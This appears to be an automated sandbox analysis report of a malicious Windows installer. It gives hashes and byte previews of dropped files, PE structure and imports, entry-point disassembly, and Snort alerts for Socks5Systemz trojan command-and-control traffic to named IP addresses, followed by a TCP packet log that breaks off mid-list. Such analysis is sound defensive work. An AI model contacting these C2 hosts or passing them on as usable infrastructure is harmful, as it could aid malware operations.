                                                                                    SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_setup64.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):6144
                                                                                    Entropy (8bit):4.215994423157539
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                    MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                    SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                    SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                    SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_shfoldr.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23312
                                                                                    Entropy (8bit):4.596242908851566
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                    MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                    SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                    SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                    SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.99883089957613
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                                    • Inno Setup installer (109748/4) 1.08%
                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    File name:tOniaJ21lj.exe
                                                                                    File size:4'969'628 bytes
                                                                                    MD5:fa367a7d44377d2c3f684c3912fec827
                                                                                    SHA1:cb9e24a00431a7cccecf333b5d4ec34785389191
                                                                                    SHA256:7256e9f673b78c62aae25f78902c393d758262202e8ab4e4b4f1d5d01cd4cd12
                                                                                    SHA512:90edcd670a8b1354b7c016e8ea1980c768ecddb55de990261d1e88b3a524152a6710f72f79df5d7e4f791ae7c5f74aef7c0548f019613495309cc91ac4889ec5
                                                                                    SSDEEP:98304:mijrTEGdwJoSZ3iYy6zAhDzjk9AuLS4HPaOMNRiYcMYO4:RPTEjl3IhLaAuL9iOERiYRYO4
                                                                                    TLSH:633633DE4AE5DEBEF2ED8F368C11D2F5A167B440323C460D3A94D1DEA7225A2941F360
                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                    File Icon

                                                                                    Icon Hash:2d2e3797b32b2b99

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x409b24
                                                                                    Entrypoint Section:CODE
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:1
                                                                                    OS Version Minor:0
                                                                                    File Version Major:1
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:1
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:884310b1928934402ea6fec1dbd3cf5e

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    add esp, FFFFFFC4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    xor eax, eax
                                                                                    mov dword ptr [ebp-10h], eax
                                                                                    mov dword ptr [ebp-24h], eax
                                                                                    call 00007F45B8B35FF7h
                                                                                    call 00007F45B8B371FEh
                                                                                    call 00007F45B8B39429h
                                                                                    call 00007F45B8B39470h
                                                                                    call 00007F45B8B3BD63h
                                                                                    call 00007F45B8B3BECAh
                                                                                    xor eax, eax
                                                                                    push ebp
                                                                                    push 0040A1DBh
                                                                                    push dword ptr fs:[eax]
                                                                                    mov dword ptr fs:[eax], esp
                                                                                    xor edx, edx
                                                                                    push ebp
                                                                                    push 0040A1A4h
                                                                                    push dword ptr fs:[edx]
                                                                                    mov dword ptr fs:[edx], esp
                                                                                    mov eax, dword ptr [0040C014h]
                                                                                    call 00007F45B8B3C8F0h
                                                                                    call 00007F45B8B3C457h
                                                                                    lea edx, dword ptr [ebp-10h]
                                                                                    xor eax, eax
                                                                                    call 00007F45B8B39A59h
                                                                                    mov edx, dword ptr [ebp-10h]
                                                                                    mov eax, 0040CDE4h
                                                                                    call 00007F45B8B360A8h
                                                                                    push 00000002h
                                                                                    push 00000000h
                                                                                    push 00000001h
                                                                                    mov ecx, dword ptr [0040CDE4h]
                                                                                    mov dl, 01h
                                                                                    mov eax, 004072ECh
                                                                                    call 00007F45B8B3A2E8h
                                                                                    mov dword ptr [0040CDE8h], eax
                                                                                    xor edx, edx
                                                                                    push ebp
                                                                                    push 0040A15Ch
                                                                                    push dword ptr fs:[edx]
                                                                                    mov dword ptr fs:[edx], esp
                                                                                    call 00007F45B8B3C960h
                                                                                    mov dword ptr [0040CDF0h], eax
                                                                                    mov eax, dword ptr [0040CDF0h]
                                                                                    cmp dword ptr [eax+0Ch], 01h
                                                                                    jne 00007F45B8B3CA9Ah
                                                                                    mov eax, dword ptr [0040CDF0h]
                                                                                    mov edx, 00000028h
                                                                                    call 00007F45B8B3A6E9h
                                                                                    mov edx, dword ptr [0040CDF0h]
                                                                                    cmp eax, dword ptr [edx+00h]

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    CODE0x10000x92440x940000d95da090f9b045cc52199c7b36d118False0.6099820523648649data6.529731839731562IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    DATA0xb0000x24c0x40005e73e67429288e06500812b62979d5fFalse0.3076171875data2.734223999371757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    BSS0xc0000xe480x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x110000x2c000x2c0054be3ee6577149680bc2c4b96413addbFalse0.32288707386363635data4.464100021311754IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                    RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                    RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                    RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                    RT_STRING0x125740x2f2data0.35543766578249336
                                                                                    RT_STRING0x128680x30cdata0.3871794871794872
                                                                                    RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                    RT_STRING0x12e440x68data0.75
                                                                                    RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                    RT_STRING0x12f600xaedata0.5344827586206896
                                                                                    RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                    RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                    RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.2781456953642384
                                                                                    RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093

                                                                                    Imports

                                                                                    DLLImport
                                                                                    kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                    user32.dllMessageBoxA
                                                                                    oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                    kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                    user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                    comctl32.dllInitCommonControls
                                                                                    advapi32.dllAdjustTokenPrivileges

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    DutchNetherlands
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    06/11/24-19:43:31.633412TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15264380192.168.2.594.156.8.14
                                                                                    06/11/24-19:42:57.171208TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15262380192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:26.414769TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15264080192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:49.420215TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15265580192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:40.013828TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15264980192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:07.601992TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15262980192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:53.737196TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15265880192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:01.749476TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15262680192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:10.177838TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15263180192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:16.249164TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15263580192.168.2.594.156.8.14
                                                                                    06/11/24-19:44:00.280298TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15266380192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:06.376941TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15262880192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:00.233904TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15262580192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:27.013923TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15264180192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:52.482822TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15265780192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:11.744384TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15263280192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:15.633502TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15263480192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:36.034207TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15264680192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:45.320897TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15265280192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:57.593794TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15266180192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:18.748451TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15263780192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:08.901351TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15263080192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:13.030652TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15263380192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:58.873534TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15266280192.168.2.594.156.8.14
                                                                                    06/11/24-19:42:55.670104TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15262180192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:17.515047TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15263680192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:34.748394TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15264580192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:38.697972TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15264880192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:41.371967TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15265080192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:47.586566TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15265380192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:23.899062TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15263980192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:48.123287TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15265480192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:34.149022TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15264480192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:20.092414TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15263880192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:37.280010TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15264780192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:56.313009TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15266080192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:42.763270TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15265180192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:05.666289TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15262780192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:50.748248TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15265680192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:55.016662TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15265980192.168.2.594.156.8.14
                                                                                    06/11/24-19:43:29.603330TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15264280192.168.2.594.156.8.14
                                                                                    06/11/24-19:42:54.899608TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15261880192.168.2.594.156.8.14
                                                                                    06/11/24-19:42:58.732763TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M15262480192.168.2.594.156.8.14

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jun 11, 2024 19:42:50.643104076 CEST5261880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:50.648241997 CEST805261894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:50.648346901 CEST5261880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:50.648471117 CEST5261880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:50.653326035 CEST805261894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:52.047190905 CEST805261894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:52.049073935 CEST5261880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:52.052141905 CEST526192023192.168.2.5194.59.31.219
                                                                                    Jun 11, 2024 19:42:52.056972027 CEST202352619194.59.31.219192.168.2.5
                                                                                    Jun 11, 2024 19:42:52.061014891 CEST526192023192.168.2.5194.59.31.219
                                                                                    Jun 11, 2024 19:42:52.061075926 CEST526192023192.168.2.5194.59.31.219
                                                                                    Jun 11, 2024 19:42:52.065887928 CEST202352619194.59.31.219192.168.2.5
                                                                                    Jun 11, 2024 19:42:52.068883896 CEST526192023192.168.2.5194.59.31.219
                                                                                    Jun 11, 2024 19:42:52.073654890 CEST202352619194.59.31.219192.168.2.5
                                                                                    Jun 11, 2024 19:42:52.889204025 CEST202352619194.59.31.219192.168.2.5
                                                                                    Jun 11, 2024 19:42:52.943830967 CEST526192023192.168.2.5194.59.31.219
                                                                                    Jun 11, 2024 19:42:54.899607897 CEST5261880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:54.904643059 CEST805261894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:55.545264006 CEST805261894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:55.547965050 CEST5261880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:55.664609909 CEST5261880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:55.664854050 CEST5262180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:55.669665098 CEST805262194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:55.669867992 CEST805261894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:55.669955015 CEST5261880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:55.669964075 CEST5262180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:55.670104027 CEST5262180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:55.674845934 CEST805262194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:57.040334940 CEST805262194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:57.040555000 CEST5262180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:57.041702986 CEST526222023192.168.2.5194.59.31.219
                                                                                    Jun 11, 2024 19:42:57.046744108 CEST202352622194.59.31.219192.168.2.5
                                                                                    Jun 11, 2024 19:42:57.047041893 CEST526222023192.168.2.5194.59.31.219
                                                                                    Jun 11, 2024 19:42:57.047041893 CEST526222023192.168.2.5194.59.31.219
                                                                                    Jun 11, 2024 19:42:57.047041893 CEST526222023192.168.2.5194.59.31.219
                                                                                    Jun 11, 2024 19:42:57.052102089 CEST202352622194.59.31.219192.168.2.5
                                                                                    Jun 11, 2024 19:42:57.097125053 CEST202352622194.59.31.219192.168.2.5
                                                                                    Jun 11, 2024 19:42:57.164717913 CEST5262180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:57.165043116 CEST5262380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:57.170846939 CEST805262394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:57.170881987 CEST805262194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:57.170950890 CEST5262380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:57.170977116 CEST5262180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:57.171207905 CEST5262380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:57.177278042 CEST805262394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:57.837367058 CEST202352622194.59.31.219192.168.2.5
                                                                                    Jun 11, 2024 19:42:57.837441921 CEST526222023192.168.2.5194.59.31.219
                                                                                    Jun 11, 2024 19:42:58.559915066 CEST805262394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:58.560030937 CEST5262380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:58.724236012 CEST5262380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:58.724710941 CEST5262480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:58.729451895 CEST805262394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:58.729526997 CEST5262380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:58.729545116 CEST805262494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:42:58.729625940 CEST5262480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:58.732763052 CEST5262480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:42:58.737624884 CEST805262494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:00.105539083 CEST805262494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:00.105685949 CEST5262480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:00.227993011 CEST5262480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:00.228429079 CEST5262580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:00.233376980 CEST805262594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:00.233524084 CEST5262580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:00.233565092 CEST805262494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:00.233652115 CEST5262480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:00.233903885 CEST5262580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:00.240581036 CEST805262594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:01.623615980 CEST805262594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:01.623749971 CEST5262580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:01.743169069 CEST5262580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:01.743500948 CEST5262680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:01.749114990 CEST805262694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:01.749277115 CEST5262680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:01.749471903 CEST805262594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:01.749475956 CEST5262680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:01.749526978 CEST5262580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:01.754246950 CEST805262694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:03.654938936 CEST805262694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:03.655030012 CEST5262680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:03.779597998 CEST5262680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:03.779953957 CEST5262780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:03.784737110 CEST805262794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:03.784787893 CEST805262694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:03.784888983 CEST5262680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:03.784909010 CEST5262780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:03.785664082 CEST5262780192.168.2.594.156.8.14
